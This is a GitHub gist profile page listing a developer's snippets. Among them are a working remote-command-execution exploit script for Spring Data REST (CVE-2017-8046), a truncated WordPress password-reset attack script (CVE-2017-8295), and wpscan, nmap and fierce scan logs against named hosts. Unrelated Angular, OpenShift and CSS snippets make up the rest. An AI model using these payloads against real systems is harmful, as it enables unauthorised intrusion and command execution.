Skip to content

Instantly share code, notes, and snippets.

View hypery2k's full-sized avatar
🎯
Focusing

Martin Reinhardt hypery2k

🎯
Focusing
114 followers · 85 following
View GitHub Profile
@hypery2k
hypery2k / CVE-2017-8046
Created September 29, 2018 12:12
SpringBoot REST Attack
APP_URL=$1
REMOTE_COMMAND=$2
curl -i -X POST -H "Content-Type: application/json" -d '{ "name" : "Test", "attribute" : "foo"}' http://$APP_URL/entity
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(java.lang.Runtime).getRuntime().exec(\"'$REMOTE_COMMAND'\").x", "value" : "pwned" }]' "http://$APP_URL/entity/1/"
@hypery2k
hypery2k / CVE-2017-8295
Created September 29, 2018 12:03
WordPress Hack
FAKE_DOMAIN=$1
DOMAIN=$2
USERNAME=$3
echo -e "\nAttempting to reset the password for '$USERNAME' on $DOMAIN:";
RESPONSE=$(curl --write-out %{http_code} --silent --output /dev/null \
-X POST "http://$DOMAIN/wp-login.php?action=lostpassword" \
-H 'cache-control: no-cache' \
-H 'content-type: application/x-www-form-urlencoded' \
@hypery2k
hypery2k / Scan WordPress with wpscan
Last active September 29, 2018 12:14
wpscan
root@60808f78e55d:/# wpscan honeypot-wp.holisticon.de
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
@hypery2k
hypery2k / map
Created September 29, 2018 11:09
Nikto & NMap
root@60808f78e55d:/# nmap -Pn -sV --version-all --reason -v honeypot-wp.holisticon.de
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-21 09:12 UTC
NSE: Loaded 43 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 09:12
Completed Parallel DNS resolution of 1 host. at 09:12, 0.00s elapsed
Initiating SYN Stealth Scan at 09:12
Scanning honeypot-wp.holisticon.de (195.201.92.37) [1000 ports]
Discovered open port 80/tcp on 195.201.92.37
Discovered open port 22/tcp on 195.201.92.37
Completed SYN Stealth Scan at 09:12, 3.39s elapsed (1000 total ports)
@hypery2k
hypery2k / AWS Fierce Request
Last active September 29, 2018 11:05
Fierce
root@kali:~# fierce -DNS cloudci.net
DNS Servers for cloudci.net:
ns-999.awsdns-60.net
ns-1802.awsdns-33.co.uk
ns-1444.awsdns-52.org
ns-420.awsdns-52.com
Trying zone transfer first...
Testing ns-999.awsdns-60.net
Request timed out or transfer not allowed.
@hypery2k
hypery2k / RxJS.md
Last active October 27, 2021 13:51
Angular Code Review

Subscribing to Multiple Observables in Angular Components

Angular applications heavily rely on RxJS Observables. While building large front end apps with these technologies we quickly will need to learn how to manage subscribing to multiple Observables in our components. In this post we are going to cover five different ways to subscribe to multiple Observables and the pros and cons of each.

Observables

In our component, we will have three Observables. Each Observable has slightly different behavior. The first Observable emits a single value immediately. The second Observable emits a single value after a couple of seconds. The third Observable emits multiple values one value every second. Below are some functions that return the Observables that we will use in our components.

import { Observable } from 'rxjs/Observable';
import { of } from 'rxjs/observable/of';
@hypery2k
hypery2k / rhsso-on-openshift.sh
Created February 22, 2018 14:20 — forked from jpkrohling/rhsso-on-openshift.sh
Red Hat SSO on OpenShift
SECRETS_KEYSTORE_PASSWORD=$(openssl rand -base64 512 | tr -dc A-Z-a-z-0-9 | head -c 17)
oc cluster up --version=latest
oc login -u system:admin
oc new-project redhat-sso
oc create serviceaccount sso-service-account
oc policy add-role-to-user view system:serviceaccount:redhat-sso:sso-service-account
oc create -n openshift -f https://raw.githubusercontent.com/jboss-openshift/application-templates/ose-v1.3.7/jboss-image-streams.json
for template in sso71-https.json \
sso71-mysql-persistent.json \
@hypery2k
hypery2k / INSTALL
Created February 7, 2018 14:56
letsencrypt role @ AppAgile
oc create -f letsencrypt-clusterrole.yaml
oc adm policy add-cluster-role-to-user letsencrypt system:serviceaccount:bdkinfrastructure:letsencrypt
oc adm policy add-cluster-role-to-user letsencrypt system:serviceaccount:bdk-fo-dev:letsencrypt
// or maybe cluster-wide for our projects if possible
@hypery2k
hypery2k / vis.css
Created November 17, 2017 10:11
$('<style>.vis-background,.vis-labelset,.vis-timeline{overflow:hidden}.vis .overlay{position:absolute;top:0;left:0;width:100%;height:100%;z-index:10}.vis-active{box-shadow:0 0 10px #86d5f8}.vis [class*=span]{min-height:0;width:auto}div.vis-configuration{position:relative;display:block;float:left;font-size:12px}div.vis-configuration-wrapper{display:block;width:700px}div.vis-configuration-wrapper::after{clear:both;content:"";display:block}div.vis-configuration.vis-config-option-container{display:block;width:495px;background-color:#fff;border:2px solid #f7f8fa;border-radius:4px;margin-top:20px;left:10px;padding-left:5px}div.vis-configuration.vis-config-button{display:block;width:495px;height:25px;vertical-align:middle;line-height:25px;background-color:#f7f8fa;border:2px solid #ceced0;border-radius:4px;margin-top:20px;left:10px;padding-left:5px;cursor:pointer;margin-bottom:30px}div.vis-configuration.vis-config-button.hover{background-color:#4588e6;border:2px solid #214373;color:#fff}div.vis-configuration.vis-conf
@hypery2k
hypery2k / keybase.md
Created February 10, 2017 06:42
keybase.md

Keybase proof

I hereby claim:

  • I am hypery2k on github.
  • I am hyper2k (https://keybase.io/hyper2k) on keybase.
  • I have a public key whose fingerprint is 88EF 4441 51FB CEFD 450B 4DA7 8399 7039 462E AFB2

To claim this, I am signing this object: